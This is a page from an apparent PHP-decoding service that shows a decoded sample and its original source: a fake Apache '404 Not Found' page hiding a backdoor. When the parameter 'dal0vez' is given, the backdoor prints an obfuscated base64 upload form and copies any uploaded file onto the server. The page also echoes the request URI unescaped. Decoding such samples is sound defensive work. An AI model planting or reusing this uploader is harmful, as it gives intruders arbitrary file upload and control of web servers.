Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</ti..
Decoded Output download
Noneb'"<form method=\'POST\' enctype=\'multipart/form-data\'><input type=\'file\'name=\'f\' /><input type=\'submit\' value=\'up\' /></form>"'
Did this file decode correctly?
Original Code
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <?php echo $_SERVER['REQUEST_URI'];
?> was not found on this server.</p>
</body></html>
<?php
if(isset($_GET["dal0vez"])){
echo(base64_decode("Ijxmb3"."JtIG1ldGhvZD0n"."UE9TVCcgZW5jdHlw"."ZT0nbXVsdGlwYXJ0L2Z"."vcm0tZGF0YSc+PGl"."ucHV0IHR5cGU9J2ZpbGUnbmF"."tZT0nZicgLz48aW5wdXQgdHlwZT0nc3V"."ibWl0JyB2YWx1ZT0ndXAnIC8+PC9mb3JtPiI="));
@copy($_FILES['f']['tmp_name'],$_FILES['f']['name']);
echo("<a href=".$_FILES['f']['name'].">".$_FILES['f']['name']."</a>");
}
?>
Function Calls
base64_decode | 1 |
Stats
MD5 | 1d2390c4a7fb119e9428ea0ec6a69973 |
Eval Count | 0 |
Decode Time | 54 ms |